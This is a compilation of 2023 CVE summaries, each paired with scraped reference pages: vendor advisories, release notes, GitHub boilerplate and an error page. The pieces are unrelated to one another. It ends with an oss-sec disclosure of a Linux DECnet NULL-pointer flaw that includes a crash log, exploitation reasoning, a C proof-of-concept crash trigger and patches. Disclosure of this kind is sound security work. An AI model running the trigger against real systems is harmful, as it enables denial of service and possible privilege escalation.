A hash collision flaw was found in the IPv6 connection lookup table in the Linux kernel’s IPv6 functionality when a user makes a new kind of SYN flood attack. A user located in the local network or with a high bandwidth connection can increase the CPU usage of the server that accepts IPV6 connections up to 95%.

'2175903?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-1206: Invalid Bug ID

A use-after-free flaw was found in the Netfilter subsystem of the Linux kernel when processing named and anonymous sets in batch requests, which can lead to performing arbitrary reads and writes in kernel memory. This flaw allows a local user with CAP_NET_ADMIN capability to crash or potentially escalate their privileges on the system.

CVE-2023-3117

com.perimeter81.osx.HelperTool in Perimeter81 10.0.0.19 on macOS allows Local Privilege Escalation (to root) via shell metacharacters in usingCAPath.

Share feedback

Thanks for sharing your feedback!

**MacOS agent 10.0.0.19**

**May 7th, 2023**

**New Features:**

*   The agent now supports the new Exclude configuration option for Split Tunneling (so that all traffic except specific addresses will go through the tunnel).

**Resolved Issues:**

*   P81-23365 - Mac agent launching twice, 2 different instances running at the same time
*   P81-26071 - OpenVPN connection sometimes taking too long

**MacOS agent 9.0.1.9**

**New Features:**

*   You can now switch between protocols while the agent is connected to a network! Simply select a protocol in the Protocols tab to switch to it.
*   When the user session expires (according to the session length set by the administrator), the agent will be automatically logged out during local night time, in order to avoid disconnections during the workday. This applies to session lengths of 2 days and above.

**Enhancements:**

*   Logging improvements
*   Agent installation will be prevented on unsupported MacOS version 10.14 and below

**Resolved Issues:**

*   P81-18590 - On macOS 13.0, sometimes the quick access UI and Full agent UI were displayed simultaneously when changing networks
*   P81-20543 - Incorrect icon state after silent upgrade of the agent
*   P81-23034 - Agent disconnection after OS upgrade to Mac OS 13.2
*   P81-23462 - SWG Web Filtering not working when a rule is set with two custom URLs that one is contained within the other
*   P81-7337 - Agent logs show that user is using macOS 10.16 when it is actually a higher version

**MacOS agent 9.0.0.28**

**New Features:**

*   Secure Web Gateway (SWG) now includes Malware Protection! SWG users now have an additional layer of protection against malicious software, on top of the existing web filtering functionality. Malware Protection actively scans content before it reaches the user's browser, blocks multiple types of threats, and notifies the user. Admins can view logs of blocked malware in a new page under the Monitor and Logs section.

**Enhancements:**

*   Log file size decreased, implemented log rotation
*   Added support for long-life certificates for SDP sessions
*   Updated internal frameworks to support minimum target OS of 10.15
*   Improved SWG module behaviour, increased reliability of Proxy module
*   Improved memory usage of agent and fixed issues with memory leaks
*   Improved stability
*   Improved connectivity

**Resolved Issues:**  
P81-21296 - Fixed an issue related to the Disable Sign-out feature  
P81-22039 - Fixed issue when agent UI was out of sync with Daemon  
P81-14902 - Fixed Trusted Wired Network MAC address case-insensitive comparison

**MacOS agent 8.0.6.166**

**Resolved Issues:**  
P81-16293 - Excessive memory consumption when using SWG

**MacOS agent 8.0.6.163**

**New Features:**

*   The agent can now remain connected while P81 SDP backend is restarted/offline, for better connection stability

**Enhancements:**

*   Added additional logging events on VPN reconnection and Probe failure
*   In the Protocols section, relabeled 'Automatic' protocol to 'Default'
*   Improved mechanism for fetching Public IP
*   Increased shared codebase between MacOS and iOS agents for better compatibility

**Resolved Issues:**  
P81-12527, P81-12562 - Unplanned disconnections  
P81-12869, P81-6732 - Sporadically cannot login to the agent - 'your session was not established'  
P81-14787 - Routing table not updated on Split Tunneling update until user disconnects  
P81-13988 - Agent User Interface is cut off when it’s the rightmost icon in the macOS tray  
P81-7450 - Fixed sorting in Quick Access networks list  
P81-14953 - Install update prompt appears without user interaction  
P81-16096, P81-16864 - DPC failed although conditions passed, until reboot  
P81-16189, P81-16949 - While connecting to VPN on unsecured WiFi, Internet is unavailable for 40-60 seconds

**MacOS agent 8.0.5.143**

**New Features:**

*   New wake from sleep mechanism logic
*   Added 'Quit' button to the agent's quick-UI for easier access
*   Added 'Reset Agent' button to the loading screen if it does not connect within 60 seconds
*   Added 'Reset Agent' button to the full UI (under the Support tab) to provide the ability to reset the agent at any time

**Resolved Issues:**

*   P81-14321 - Infinite connection attempts
*   P81-14317 - The loading screen does not disapear
*   P81-13962 - Agent says it's connected but loses all Internet connectivity
*   P81-13257 - Possible command injection vector via DPC
*   P81-13188 - DPC stuck after machine reboot
*   P81-12978 - Proxy communication issue
*   P81-12749 - Presented with a "You have reached your pre-configured connection time limit" error
*   P81-12698 - DPC: Device Activity Log does not appears in web console at admission time, only after DPC scheduled recheck time (20 minutes)
*   P81-12360 - Agent log files take too much space (0.4 GB)
*   P81-7128 - The Device Activity log shows 'No Hostname' instead of the device name
*   P81-6628 - The user is not signed out properly after the agent receives a new token

**MacOS agent 8.0.4.132**

**New Features:**

*   Disable Sign-Out (enforce Always On) - this feature is being gradually rolled out and will be available to all customers in a few weeks. Requires this version of the agent and above.
*   Agent sign-out brute-force prevention
*   Allow admins to control whether using the internal DNS is enforced or not, in order to support co-existing with products that require control over DNS

**Enhancements:**

*   Agent version is now displayed before login, for easier troubleshooting
*   The Quit button has been re-added to the agent extended UI, allowing users to shut down the agent application and the Perimeter 81 service in case they need to
*   P81-11453 - SWG bootstrap certificate enhancement

**Resolved Issues:**

*   P81-13378 - Changing settings on the console would cause the agent to Reconnect
*   P81-12977 - RegionName always showed N/A
*   P81-12747, P81-12674, P81-12571, P81-12525, P81-12164 - Issues connencting after sleep
*   P81-12746 - Connectivity issue when using SWG
*   P81-12417, P81-12618 - Connectivity issues
*   P81-12560 - Sign-in failing to open browser
*   P81-12539, P81-12519 - Websites unreachable
*   P81-12536 - SWG rules issues
*   P81-12461 - Internet connection issue after session timeout
*   P81-12419 - Reconnection process takes too long
*   P81-12269 - Public IP stuck in "Refreshing" and losing Internet connectivity
*   P81-11170, P81-11171, P81-12807 - Internal log fixes
*   P81-6859 - Silent Upgrade improvements
*   P81-6467 - UI bugs
*   P81-11531 - Better handling of ProtocolFilters in regards to certificates
*   P81-12720 - SWG bug fixes

**MacOS agent 8.0.4.124**

**Enhancements:**

*   Changed MTU for Wireguard to 1380 to improve connectivity in low-MTU scenarios
    
*   The Perimeter 81 certificate is now installed only if using Secure Web Gateway. If needed, users are referred to a webpage on how to complete the certificate and add-on setup
    
*   'Start Minimized' removed from Settings screen
    

**Resolved Issues:**

P81-11830/P81-10601 Connection is not restored after sleep  
P81-11673 Sometimes the app Signed Out incorrectly  
P81-11251/P81-11163 Agent stuck with connect button not responding  
P81-11211 DNS fails after sleep on latest Mac version (Monterey 12.3)  
P81-11074/P81-10889 Constant disconnections  
P81-11071 Connection issue with IKE protocol  
P81-11035/P81-11034/P81-8381Connection issue with Wireguard  
P81-11027/P81-11026/P81-10631 Internet connection blocked/unstable  
P81-10922/P81-10916 After sleep, the agent is connected but there is no internet connectivity  
P81-10874 Sign In button not working after session timeout  
P81-10556 Network adaptor changing every several minutes  
P81-9987 Split tunneling configuration didn't updated till Agent reconnection  
P81-9804 Client generates certificate errors  
P81-8032 "Connected to Network" notification doesn't hide automatically  
P81-7340 After upgrading XPC between Daemons, Proxy is not starting  
P81-6312/P81-3930 "Private DNS" icon not displayed on network with "Regional Private DNS"  
P81-6080 Closed Mac agent pops up every time Firewall rule is changed

**MacOS agent 8.0.4.116**

Fixed Issues:

*   P81-9839/P81-9833/P81-9795 - App crash
*   P81-9794/P81-9493 Connection issue - agent stuck in 'Reconnecting'
*   P81-9500 Failed to connect while returning from sleep mode
*   P81-9181 Agent takes a while to reconnect after sleep
*   P81-9152 Sign Out pop-up header displayed incorrectly
*   P81-8233 Device Activity Log - MacBook still appears as Healthy even though found Not Healthy
*   P81-8048 Apple M1 Pro - Disconnect during Zoom
*   P81-7340 SWG - Proxy not starting after upgrading XPC between Daemons
*   P81-5273 .pkg error - 'The Package is unsigned'
*   P81-910 .pkg installer file - Unsupported file format in MobileIron
*   P81-8236 Icons for Support, Settings, Sign Out are blurred

New features:

*   P81-9985 When installing using pkg file, the P81 certificate will not be installed unless specified by admin
*   P81-7551 The agent now allows admins to pre-populate the workspace value during installation via CLI.

**MacOS agent 8.0.4.108**

Fixed Issues:

*   P81-6326 - Failed to login after agent upgrade.
*   P81-4795 - DNS lost randomly when using split tunneling + custom DNS.
*   P81-7608 - IPv6 behavior is unpredictable.
*   P81-5029 - Improved messaging when pre-configured connection time limit is reached.
*   P81-2455 - agent UI pops up upon changing firewall rules.
*   P81-5034 - renamed 'diagnose issues' button to 'Send logs to support'.

New Features:

*   The Perimeter 81 agent now runs as a service in the background! There is no need to keep the agent UI open - it is always up and available via an icon in the system tray.
*   Connectivity and stability have been improved.
*   The agent now has a brand new “quick access” UI, which allows you to perform most operations from a single screen by clicking on the tray icon. The classic UI is still available, and can still be accessed in order to configure settings, contact support etc.
*   This agent version supports Secure Web Gateway (SWG).

**MacOS agent 7.0.3.37**

Fixed issues:

*   P81-2389 - Helper tool installation requires admin permissions
*   P81-5385 - Crash on changing networks while OpenVPN connected on TWN
*   P81-5332 - Post connection loss authentication issue
*   P81-4796 - Correction of description for Automatic Protocol
*   P81-4764 - Agent stuck in reconnecting when coming out of sleep mode
*   P81-4368 - Agent stuck in Reconnecting state

New features:

*   P81-5029 - Improve the output message after "Automatically log out Client "
*   P81-5026 - Remove "contact support" suggestion when failing DPC
*   P81-5034 - Rename "diagnose issues" button
*   P81-4699 - Compatibility with MacOS 12.0 Monterey

**MacOS agent 7.0.3.28**

Fixed issues:

*   P81-3293 - Added latency measurements BI events
*   P81-3312 - Fixed device register issue caused by UDID non-escaping

**MacOS agent 7.0.2.21**

Fixed issues:

*   P81-1995 — Device posture check says that disk is not encrypted when it actually is encrypted
*   P81-2021 — Incorrect VPN status on Home screen if Start Minimized=ON and VPN has connected automatically
*   P81-2532 — Agent stuck on reconnecting
*   P81-3111 — DPC failed for all the rules that should pass
*   P81-3179 — App hanging during TWN check processing

**MacOS agent 7.0.2.19**

Fixed issues:

*   P81-2680 — Trusted Wired Networks - Agent user still needs to enter code on Quit/sign out while connected to TWN
*   P81-2198 — User still needs to enter code on Quit/Sign Out while on TWNP81-2198
*   P81-2633 — The Always On Not restored 0n turning Netwotk's toggle if Network above in list is Disabled
*   P81-2231 — Attempt to connect to the VPN is made on setting AlwaysOn by user
*   P81-2199 — No "Connected to Trusted Network" badge on Home screen when computer on TWN
*   P81-2198 — User still needs to enter code on Quit/Sign Out while on TWN
*   P81-2215 — The app connected to VPN on user setting AlwaysOn=ON while connected to TWN
*   P81-2550 — Show appropriate text when hovering over the "Connected to Trusted Network" badge
*   P81-2798 — MacOS P81 DPC: Condition "AND" for "Process Running" doesn't work

**MacOS 7.0.1.12**

*   Silent upgrade feature imlemented

**MacOS 7.0.1.7**

*   Fixed issue when agent app pops up with every ZTA change — P81-1117, P81-1115
*   Fixed wrong Device Name documented in Device Activity — P81-1364
*   Fixed Internal IP Not Defined issue, when VPN get connected — P81-1347
*   Moved Snowplow session cache file outside of the user’s Documents folder — P81-937

**MacOS 7.0.1.6****New features:**

*   Device Posture Check feature implemented

**Resolved Issues:**

*   Fixed app crash issue — P81-726
*   Fixed app re-connect issue when losing WiFi — P81-906
*   Fixed Run on StartUp issue — P81-914
*   Fixed Sign Out” and “Quit” option from doesn’t work if app is not in foreground — P81-1027
*   Fixed app re-login when DPC check has failed — P81-1452
*   Fixed Disconnect/Connect notifications showing — P81-1110
*   Fixed high CPU consumption issue when the app is in background — P81-438
*   Fixed SDP socket re-connect issue after sleep-mode

**MacOS 7.0.0 (7):****Bug fixes:**

*   Application complete re-design, Main view, Settings page, Support page, OnBoarding page
*   Implemented new login flow using default browser with SSO support
*   Implemented accessToken token rotation before performing Logout call -- #MAC-1056
*   Added timeout for LoginSucceeded event -- #MAC-1075
*   Added full username showing inside of the Main view (if it’s available) -- #MAC-1083
*   Added support ticket number for the user if it’s available from Troubleshooting -- #MAC-1074
*   Change user’s email address fetching from JWT to channel.OnUpdated data payload -- #MAC-1066
*   Fixed Connection/Reconnection initiated from Connect on Launch can’t be interrupted -- #MAC-1079
*   Fixed Hide Automatic Location from Icon/Dock menus -- #MAC-1086
*   Fixed issue when Admin can’t enforce upgrade to the latest version -- #MAC-942
*   Disable KillSwitch by default for AlwaysON -- #MAC-1081
*   Fixed Sleep/awake re-connect issue -- #MAC-1061
*   Fixed Disconnect button non-responsiveness when agent connecting/reconnecting -- #MAC-1078
*   Fixed expand/collapse Shared Networks issue, when hover stopped to work -- #MAC-1062
*   Fixed issues when “Change Network” button displayed incorrectly when “Upgrade Application” is enforced -- #MAC-1111
*   Added BI events sending support
*   Added osVersion as a part of channel.open payload
*   Implemented automated Troubleshooting script, now avg processing time is ~1 min -- #MAC-1093
*   Fixed “Sign Out” and “Quit” options from notification area context menu when app is in background mode -- #MAC-1100, #MAC-1099
*   Fixed “Automatic Location” network option -- #MAC-1096
*   Added tooltips for SignOut / Exit Settings buttons, Main + OnBoarding windows appear at the same time -- #MAC-1088
*   Fixed “Automatic Location” network option -- #MAC-1096
*   Fixed UI blinking when switching between Home tab and any other -- #MAC-1073
*   Fix network selection logic -- #MAC-1087

Was this article helpful?

CVE-2023-33298: MacOS - Agent

Improper Information in Cybersecurity Guidebook in Bosch Building Integration System (BIS) 5.0 may lead to wrong configuration which allows local users to access data via network

**Advisory Information**

*   **Advisory ID:** BOSCH-SA-988400-BT
*   **CVE Numbers and CVSS v3.1 Scores:**
    *   CVE-2023-29241
        *   Base Score: 8.1 (High)
*   **Published:** 28 Jun 2023
*   **Last Updated:** 28 Jun 2023

**Summary**

In a recent survey of BIS installations worldwide Bosch identified that for some installations the security settings may not meet our recommended security standards. For this reason, we have updated our "Cybersecurity Guidebook".

Section 4.5 of the Cybersecurity Guidebook describes how to configure access permissions for a shared folder of the BIS installation. In an older version of the Cybersecurity Guidebook, one of the recommended access permissions is wrongly stated as "Network" group instead of "Network Service" group. This information is updated in the new version of the documentation, because executing the earlier instructions may unintentionally grant access permission to potentially unauthorized users.

This is not a software bug, just an update of the documentation targeted at installers. This document is included in BIS installation folder since version BIS 5.0. Previous BIS version do not contain the document, but validating the security setting is generally advised.

**Affected Products**

*   Bosch BIS
    *   CVE-2023-29241
        *   Version(s): 5.0

**Solution and Mitigations****Software Updates**

For BIS 5.0 please apply patch BIS\_5\_0\_21100\_0\_Patch1.zip. Follow the instructions in the Readme of the patch. The patch will install an updated Cybersecurity Guidebook in folder "Platform" under the installation folder. Then follow the configuration steps in section 4.5 as described.

For any previous BIS version we recommend to double-check the security settings. Please follow the mitigation section below.

**Mitigation**

Installation of BIS automatically creates the "MgtS" shared folder, which is accessible to the "Everyone" group. It is recommended to restrict the access and provide the following users and groups with full access to the "\\MgtS" shared folder:

*   MgtS-Service user
    
*   IIS-USR user
    
*   System group
    
*   Network Service group
    
*   Administrators group
    
*   BIS Users group (add all users of BIS to the group)
    

Double-check that the "Network" group is not part of the access groups. Following that, proceed to remove the access for "Everyone" group.

**Vulnerability Details****CVE-2023-29241**

CVE description: Improper Information in Cybersecurity Guidebook in Bosch Building Integration System (BIS) 5.0 may lead to wrong configuration which allows local users to access data via network

*   Problem Type:
    *   CWE-1112 Incomplete Documentation of Program Execution
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
    *   Base Score: 8.1 (High)

**Remarks****Security Update Information**

With respect to Directive (EU) 2019/770 and Directive (EU) 2019/771 and their national transposition laws, please note:

It is your responsibility to download and/or install any security updates provided by us, for example to maintain product or data security. If you fail to install a security update provided to you within a reasonable period of time, we will not be liable for any product defect solely due to the absence of such security update.

Alternatively, we are entitled to directly download and/or install security updates regardless of your settings. In these cases, we will provide you with the relevant information, e.g. in this security advisory.

**CVSS Scoring**

Vulnerability classification has been performed using the CVSS v3.1 scoring system . The CVSS environmental score is specific to each customer’s environment and should be defined by the customer to attain a final scoring.

**Additional Resources**

*   \[1\] BIS Download Area: https://downloadstore.boschsecurity.com/?type=BIS
*   \[2\] CVE-2023-29241: https://nvd.nist.gov/vuln/detail/CVE-CVE-2023-29241

Please contact the Bosch PSIRT if you have feedback, comments, or additional information about this vulnerability at: psirt@bosch.com .

**Revision History**

*   28 Jun 2023: Initial Publication

**Appendix****Fixes for the Affected Products****Building Integration System (BIS)**

 

Affected BIS versions

Version or patch that fixes the vulnerability

5.0

Apply patch BIS\_5\_0\_21100\_0\_Patch1.zip,  
then follow section 4.5 in the Cybersecurity Guidebook

**Affected material****Building Integration System (BIS)**

Family Name

CTN

SAP#

Material Description

BIS-BGEN-B50

F.01U.415.267

BIS 5.0

Basic license

BIS-BGEN-CESB50

F.01U.415.269

BIS 5.0

Central enterprise server (bundle)

BIS-BGEN-BAS50

F.01U.415.268

BIS 5.0

Basic license without alarm documents

BIS-BGEN-LSSB50

F.01U.415.270

BIS 5.0

Local site server (bundle)

BIS-BGEN-CSSB50

F.01U.415.271

BIS 5.0

Central single server (bundle)

BIS-BASE-PLUS50

F.01U.415.272

BIS 5.0

Plus license (bundle)

CVE-2023-29241: Update in Cybersecurity Guidebook of BIS on Permission Settings for Network Share

A post-authentication remote command injection vulnerability in a CGI file in Western Digital My Cloud OS 5 devices that could allow an attacker to build files with redirects and execute larger payloads.
This issue affects My Cloud OS 5 devices: before 5.26.300.



**WDC Tracking Number:** WDC-23010  
**Product Line:** My Cloud  
**Published:** June 23, 2023

**Last Updated:** June 23, 2023

**Description**

My Cloud OS 5 Firmware 5.26.300 includes updates to help improve the security of your My Cloud OS 5 devices.

To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.26.300

June 21, 2023

My Cloud PR4100

5.26.300

June 21, 2023

My Cloud EX4100

5.26.300

June 21, 2023

My Cloud EX2 Ultra

5.26.300

June 21, 2023

My Cloud Mirror G2

5.26.300

June 21, 2023

My Cloud DL2100

5.26.300

June 21, 2023

My Cloud DL4100

5.26.300

June 21, 2023

My Cloud EX2100

5.26.300

June 21, 2023

My Cloud

5.26.300

June 21, 2023

WD Cloud

5.26.300

June 21, 2023

For more information on the latest security updates, see the release notes.

**Advisory Summary**

Addressed a post-authentication remote command injection vulnerability in a CGI file that could allow an attacker to build files with redirects and execute larger payloads.

**CVE Number:** CVE-2023-22816

Western Digital would like to thank Wil Gibbs and Arvind S Raj for reporting this issue.

Addressed post-authentication remote command injection vulnerabilities that could allow an attacker to execute code in the context of the root user on vulnerable CGI files.  

**CVE Number:**  CVE-2023-22815  

Western Digital would like to thank Nikita Abramov (Positive Technologies) for reporting this issue.

CVE-2023-22816: WDC-23010 My Cloud Firmware Version 5.26.300 | Western Digital

Improper Neutralization of Formula Elements in a CSV File in GitHub repository fossbilling/fossbilling prior to 0.5.3.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2023-3493: Apply the EscapeFormula CSV formatter (#1391) · FOSSBilling/FOSSBilling@9402d6c

Unrestricted Upload of File with Dangerous Type in GitHub repository fossbilling/fossbilling prior to 0.5.3.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Limit "LIMIT" to numbers only + Disable upload theme (#1392)

\* Prevent non numeric values being used in limits

Potential abuse for Sql injection
Only allow integers to be used


Adjust exception

\* Disable upload assets via Theme pages

File upload was removed in an earlier PR

\* Make sure the test run fine

\* Fix the tests

\* Use limit instead of per\_page

\* And another fix

---------

Co-authored-by: Belle Aerni <belleaerni@gmail.com>

*   Loading branch information

CVE-2023-3491: Limit "LIMIT" to numbers only + Disable upload theme  (#1392) · FOSSBilling/FOSSBilling@2ddb743

 SQL Injection in GitHub repository fossbilling/fossbilling prior to 0.5.3.

CVE-2023-3490

A null pointer dereference issue was discovered in Libtiff's tif_dir.c file. This flaw allows an attacker to pass a crafted TIFF image file to the tiffcp utility, which triggers runtime error, causing an undefined behavior, resulting in an application crash, eventually leading to a denial of service.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

CVE-2023-2908: cve-details

A flaw null pointer dereference in the Linux kernel DECnet networking protocol was found. A remote user could use this flaw to crash the system.

**oss-sec mailing list archives**

_From_: Ornaghi Davide - Betrusted <davide.ornaghi () betrusted it>  
_Date_: Sat, 24 Jun 2023 16:11:36 +0000  

Hi all,



I'm reporting a Null Pointer Dereference vulnerability that I found while attempting to ping localhost by sending a 
Hello message to a local DECnet socket:



\`\`\`
\[45620.986136\] BUG: kernel NULL pointer dereference, address: 0000000000000000
\[45620.986141\] #PF: supervisor read access in kernel mode
\[45620.986143\] #PF: error\_code(0x0000) - not-present page
\[45620.986146\] PGD 0 P4D 0
\[45620.986148\] Oops: 0000 \[#1\] PREEMPT SMP NOPTI
\[45620.986152\] CPU: 6 PID: 37997 Comm: test Tainted: G        W    L    5.19.0-43-generic #44~22.04.1-Ubuntu
\[45620.986155\] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 
11/12/2020
\[45620.986156\] RIP: 0010:dn\_nsp\_send+0x1c9/0x200 \[decnet\]
\[45620.986159\] Code: 74 3e 8d 48 01 f0 0f b1 4a 40 41 0f 94 c6 45 84 f6 74 eb 48 89 d3 49 89 d7 48 83 e3 fe 48 89 55 90 
e8 eb f7 ac c0 48 8b 55 90 <48> 8b 02 48 8b 80 e8 00 00 00 49 89 85 e8 01 00 00 e9 93 fe ff ff
\[45620.986161\] RSP: 0018:ffffc90032abfc90 EFLAGS: 00010246
\[45620.986164\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
\[45620.986165\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
\[45620.986166\] RBP: ffffc90032abfd00 R08: 0000000000000000 R09: 0000000000000000
\[45620.986167\] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881aca6f9c0
\[45620.986168\] R13: ffff888118903cc0 R14: 0000000000000000 R15: 0000000000000000
\[45620.986172\] FS:  00007f144e58b740(0000) GS:ffff888339d80000(0000) knlGS:0000000000000000
\[45620.986173\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[45620.986175\] CR2: 0000000000000000 CR3: 0000000226154004 CR4: 0000000000770ee0
\[45620.986185\] PKRU: 55555554
\[45620.986186\] Call Trace:
\[45620.986189\]  <TASK>
\[45620.986191\]  dn\_nsp\_send\_conninit+0x207/0x4c0 \[decnet\]
\[45620.986196\]  \_\_dn\_connect+0x172/0x230 \[decnet\]
\[45620.986220\]  dn\_connect+0x5c/0xa0 \[decnet\]
\[45620.986223\]  \_\_sys\_connect\_file+0x68/0x80
\[45620.986225\]  \_\_sys\_connect+0xb6/0xe0
\[45620.986227\]  ? exit\_to\_user\_mode\_loop+0xf1/0x140
\[45620.986228\]  ? exit\_to\_user\_mode\_prepare+0x3b/0xd0
\[45620.986230\]  ? syscall\_exit\_to\_user\_mode+0x2a/0x50
\[45620.986232\]  ? do\_syscall\_64+0x69/0x90
\[45620.986234\]  \_\_x64\_sys\_connect+0x18/0x30
\[45620.986236\]  do\_syscall\_64+0x59/0x90
\[45620.986237\]  ? exit\_to\_user\_mode\_prepare+0x3b/0xd0
\[45620.986241\]  ? syscall\_exit\_to\_user\_mode+0x2a/0x50
\[45620.986242\]  ? do\_syscall\_64+0x69/0x90
\[45620.986244\]  entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
\`\`\`

## Bug details

This crash is due to the dn\_nsp\_send function (net/decnet/dn\_nsp\_out.c) which, first off, causes a Denial of Service by 
preventing the release of locks such as the current sock's sk->sk\_lock, but could also lead to Local Privilege 
Escalation under certain conditions.

When first starting a connection with a DECnet socket, the connect() handler \_\_dn\_connect, while building a route, ends 
up calling dst\_alloc (net/decnet/dn\_route.c:1178) which initializes the dst reference counter to 0 instead of 1 (see 
commit 76371d2e3ad1f84426a30ebcd8c3b9b98f4c724f for an explanation).
Later on, dn\_insert\_route is expected to increase the dst refcount, but in reality, it fails to do so, since 
dst\_hold\_and\_use (net/decnet/dn\_route.c:347) actually calls atomic\_inc\_not\_zero on dst->\_\_refcnt, which only works if 
the refcount is not 0. While the refcount hasn't changed, the dst->\_use counter is correctly incremented by 
dst\_use\_noref.

\`\`\`c
static inline void dst\_hold(struct dst\_entry \*dst)
{
    BUILD\_BUG\_ON(offsetof(struct dst\_entry, \_\_refcnt) & 63);
    WARN\_ON(atomic\_inc\_not\_zero(&dst->\_\_refcnt) == 0);            <===
}
\`\`\`

Therefore, a warning gets thrown.
As a consequence, all the following sk\_dst\_get(sk) calls will return NULL since this function also uses 
atomic\_inc\_not\_zero, and returns NULL on failure.
This condition leads to a NPD at net/decnet/dn\_nsp\_out.c:92:

\`\`\`c
if (dn\_route\_output\_sock(&sk->sk\_dst\_cache, &fld, sk, 0) == 0) {
    dst = sk\_dst\_get(sk);
    sk->sk\_route\_caps = dst->dev->features;                        <===   dst is NULL
    goto try\_again;
}
\`\`\`

## Exploitation scenarios

Furthermore, the try\_again label redirects the execution to the following code:

\`\`\`c
if (dst) {
    try\_again:
    skb\_dst\_set(skb, dst);
    dst\_output(&init\_net, skb->sk, skb);        <===
    return;
}
\`\`\`

where the dst->output() function is invoked by dst\_output to send the outgoing packet after the routing decision. In an 
attacker's ideal conditions, where the zero page is mappable, this allows arbitrary code execution.

In more modern systems, the previous scenario can be triggered multiple times to possibly control other reference 
counters and thus trigger further vulnerabilities such as UAF.
For instance, one could force the sock->file (from \_\_sys\_sendto) refcount to wrap around and eventually free it, though 
a definitive exploitation technique is still under study.

## Vulnerable versions

Linux kernels with DECnet support from Linux-4.12-rc7 (commit 76371d2e3ad1f84426a30ebcd8c3b9b98f4c724f) up to 
Linux-6.0.19.
The said subsystem has been removed during the 6.1 merge window because deprecated.

## Proof-of-Concept

The kernel has to be compiled with CONFIG\_DECNET=y and should have a DECnet address assigned (echo -n "1.10" > 
/proc/sys/net/decnet/node\_address):

\`\`\`c
int main() {
    int sockfd;

    if ((sockfd = socket(AF\_DECnet, SOCK\_SEQPACKET, DNPROTO\_NSP)) == -1) {
        perror("socket");
        exit(-1);
    }
    struct sockaddr\_dn sockaddr;
    struct nodeent dp;
    static struct dn\_naddr addr;
    char \*nodename = "turtle";
    addr.a\_addr\[0\] = 10 & 0xFF;
    addr.a\_addr\[1\] = (1 << 2) | ((10 & 0x300) >> 8);
    sockaddr.sdn\_family = AF\_DECnet;
    sockaddr.sdn\_flags  = 0x00;
    sockaddr.sdn\_objnum  = DNOBJECT\_MIRROR;
    sockaddr.sdn\_objnamel  = 0x00;

    dp.n\_addr = (unsigned char \*)&addr.a\_addr;
    dp.n\_length = 2;
    dp.n\_name = nodename;
    dp.n\_addrtype = AF\_DECnet;

    if (connect(sockfd, (struct sockaddr \*)&sockaddr, sizeof(sockaddr)) < 0) {
        perror("socket");
        exit(-1);
    }
    return 0;
}
\`\`\`

Writing a PoC that returns a root shell on devices without SMAP and vm.mmap\_min\_addr is also trivial.

## Bug fix

This was my suggested patch:

\`\`\`diff
--- a/net/decnet/dn\_route.c     2023-06-06 15:55:36.615147110 +0200
+++ b/net/decnet/dn\_route.c     2023-06-06 15:56:00.179416949 +0200
@@ -1175,7 +1175,7 @@ make\_route:
        if (dev\_out->flags & IFF\_LOOPBACK)
                flags |= RTCF\_LOCAL;

-       rt = dst\_alloc(&dn\_dst\_ops, dev\_out, 0, DST\_OBSOLETE\_NONE, 0);
+       rt = dst\_alloc(&dn\_dst\_ops, dev\_out, 1, DST\_OBSOLETE\_NONE, 0);
        if (rt == NULL)
                goto e\_nobufs;
\`\`\`

Also, always make sure that dst isn't NULL after sk\_dst\_get:

\`\`\`diff
--- a/net/decnet/dn\_nsp\_out.c   2023-06-06 22:01:57.212802584 +0200
+++ b/net/decnet/dn\_nsp\_out.c   2023-06-06 22:04:37.138709847 +0200
@@ -89,7 +89,9 @@ try\_again:
        fld.flowidn\_proto = DNPROTO\_NSP;
        if (dn\_route\_output\_sock(&sk->sk\_dst\_cache, &fld, sk, 0) == 0) {
                dst = sk\_dst\_get(sk);
-               sk->sk\_route\_caps = dst->dev->features;
+               if (!dst)
+                       return;
+               sk->sk\_route\_caps = dst->dev->features;
                goto try\_again;
        }
\`\`\`

The DECnet subsystem has been officially removed from all longterm and stable kernel series, starting from 4.14.319, 
4.19.287, 5.4.248, 5.10.185 and 5.15.118.

Best regards,

Davide Ornaghi

**Current thread:**

*   **CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet** _Ornaghi Davide - Betrusted (Jun 24)_
    *   Re: CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet _Peter Philip Pettersson (Jun 24)_

Source

CVE